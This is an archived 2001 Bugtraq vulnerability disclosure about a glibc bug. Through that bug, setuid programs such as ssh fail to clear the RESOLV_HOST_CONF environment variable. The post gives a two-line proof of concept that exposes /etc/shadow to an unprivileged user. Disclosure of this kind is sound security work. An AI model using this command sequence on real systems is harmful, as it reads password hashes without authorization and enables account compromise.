[18519] in bugtraq
Glibc Local Root Exploit
daemon@ATHENA.MIT.EDU (Charles Stevenson)
Wed Jan 10 13:09:25 2001
Mime-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
Message-Id: <B6815818.E3F%csteven@newhope.terraplex.com>
Date: Wed, 10 Jan 2001 00:06:48 -0700
Reply-To: Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>
From: Charles Stevenson <csteven@NEWHOPE.TERRAPLEX.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Hi all,
This has been bouncing around on vuln-dev and the debian-devel lists. It
effects glibc >= 2.1.9x and it would seem many if not all OSes using these
versions of glibc. Ben Collins writes, "This wasn't supposed to happen, and
the actual fix was a missing comma in the list of secure env vars that were
supposed to be cleared when a program starts up suid/sgid (including
RESOLV_HOST_CONF)." The exploit varies from system to system but in our
devel version of Yellow Dog Linux I was able to print the /etc/shadow file
as a normal user in the following manner:
export RESOLV_HOST_CONF=/etc/shadow
ssh whatever.host.com
Other programs have the same effect depending on the defaults for the
system. I have tested this on Red Hat 7.0, Yellow Dog Linux 2.0
(prerelease), and Debian Woody. Others have reported similar results on
slackware and even "home brew[ed]" GNU/Linux.
Best Regards,
Charles Stevenson
Software Engineer
--
Terra Soft Solutions, Inc
http://www.terrasoftsolutions.com/
Yellow Dog Linux
http://www.yellowdoglinux.com/
Black Lab Linux
http://www.blacklablinux.com
